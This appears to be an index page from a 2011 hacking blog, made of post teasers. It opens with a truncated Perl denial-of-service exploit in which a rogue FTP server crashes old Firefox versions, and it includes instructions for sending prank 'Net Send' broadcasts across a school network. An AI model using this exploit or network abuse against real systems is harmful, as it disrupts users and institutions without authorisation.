FireSale HackBoy

Knowledge Shared By FireSale HackBoy...

Thursday, November 3, 2011

Mozilla Firefox FTP Request Remote DoS (Exploit)

Vulnerable Systems:
* Mozilla Firefox version 1.5.0.6 and prior.

Exploit:

    #!/usr/bin/perl
    #author: tomas kempinsky
    use strict;
    use Socket;
    my $port = shift || 2121;
    my $proto = getprotobyname('tcp');
    my $payload = "\x32\x32\x30\x20\x5a\x0d\x0a\x33".
                  "\x33\x31\x20\x5a\x0d\x0a\x35\x30".
                  "\x30\x20\x44\x6f\x53\x0d\x0a\x35".
                  "\x30\x30\x20\x5a\x0d\x0a";
    socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
    setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, 1) or die "setsock: $!";
    my $paddr = sockaddr_in($port, INADDR_ANY);
    bind(SERVER, $paddr) or die "bind:...

BlueTooth Hacking Tools

Discovering Bluetooth Devices: Before any two Bluetooth-enabled devices can start communicating with one another, they must carry out a procedure known as discovery. It can be carried out by scanning for other active devices within range. Recommended Tools ...

Wireless Hacking

Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate. The step-by-step procedure in wireless hacking can be explained with the help of different topics...

Email Security Best Practices from Microsoft

Over the years, Microsoft has taken its lumps when it comes to security; however, as a company, they have taken some pretty impressive strides to make sure that their products are more secure. Their security efforts have not been limited to just their products, either. They have launched several educational campaigns aimed at helping users better secure their computers...

WebSurgery – Web Application Security Testing Suite

WebSurgery is a suite of tools for security testing of web applications. It was designed for security auditors to help them with the web application planning and exploitation. Currently, it uses an efficient, fast and stable Web Crawler, File/Dir Brute forcer, Fuzzer for advanced exploitation of known and unusual vulnerabilities such as SQL Injection, Cross site scripting (XSS), Brute force for login forms, identification of firewall-filtered rules, DOS Attacks and WEB Proxy to analyze, intercept and manipulate the traffic between your browser...

WAVSEP – Web Application Vulnerability Scanner Evaluation Project (14 Sep)

The author of WAVSEP (Shay Chen) e-mailed quite some time back about this project, but I have to say I honestly didn’t have time to look at it back then. It popped back up on my radar again when it was mentioned by the author of – Arachni v0.3 – his tool did extremely well in the WAVSEP tests. The benchmark tests the SQL Injection and Reflected XSS vulnerability detection accuracy of 12 commercial web application scanners and 48 free & open source web application scanners, and discusses the capabilities of many others (including information...

Lilith – Web Application Security Audit Tool

LiLith is a tool written in Perl to audit web applications. This tool analyses web pages and looks for HTML form tags, which often refer to dynamic pages that might be subject to SQL injection or other flaws. It works as an ordinary spider and analyses pages, following hyperlinks and injecting special characters that have a special meaning to any underlying platform. No web application scanner can ever perform a full 100% correct audit. Therefore, a manual re-check is necessary. Hence, be aware that Lilith might come up with several false...

VeriSign Demands The Power To Take Down Websites/Domains

I was scanning the news today, and nothing much was going on. There were some half-arsed stories about Anonymous and LulzSec – but nothing really worth writing about. And then, and then I spotted this, which quite frankly scares the shit out of me. As much as it may well have a use in law enforcement, I’m sorry but I don’t want any single organization, corporation or entity to have the power to take out domains. It’s just plain wrong, and well the UK has already started tabling something like this back in September. VeriSign, which manages the...

DirBuster – Brute Force Directories & Files Names

DirBuster is another great tool from the OWASP chaps; it’s basically a multi-threaded Java application designed to brute force directory and file names on web/application servers. It is often the case now that what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these. However, tools of this nature are often only as good as the directory and file list they come with. A different approach was taken to generating this. The list was generated from...

Remote Network Penetration via NetBIOS- NetBios Hacking

These are basic techniques but very useful when penetration testing any Windows-based network. The techniques were discovered on WinNT but are still very valid on Windows2000 and in some cases Windows2003 due to backwards compatibility. This article is being written in a procedural manner. I have approached it much like an intruder would actually approach a network penetration...

Wednesday, November 2, 2011

Messing With School Server

Sending messages out over the network

Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type

    Net Send <domain> * "The server is h4x0r3d"

*Note: <domain> may not be necessary, depending on how many your school has access to. If it's just one, you can leave it out*

Where <domain> is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine....

How to Block Websites & Stop Downloading Using Proxy

This example explains “How to Block Web Sites” & “How to Stop Downloading”.

First, Configure Proxy.

    /ip proxy
    set parent-proxy=0.0.0.0
    set parent-proxy-port=0
    set cache-administrator="webmaster"
    set max-cache-size=none
    set cache-on-disk=no
    set max-client-connections=600
    set max-server-connections=600
    set max-fresh-time=3d
    set always-from-cache=no
    set cache-hit-dscp=4
    set serialize-connections=no

Now, Make it Transparent

    /ip firewall nat
    add chain=dstnat protocol=tcp dst-port=80 action=dst-nat to-addresses= to-ports=8080

Make sure that your proxy...

How Hackers Hack Your Website: Overview of Common Techniques

We hear the same terms bandied about whenever a popular site gets hacked. You know… SQL Injection, cross site scripting, that kind of thing. But what do these things mean? Is hacking really as inaccessible as many of us imagine — a nefarious, impossibly technical twilight world forever beyond our ken? Not really. When you consider that you can go to Google right now and...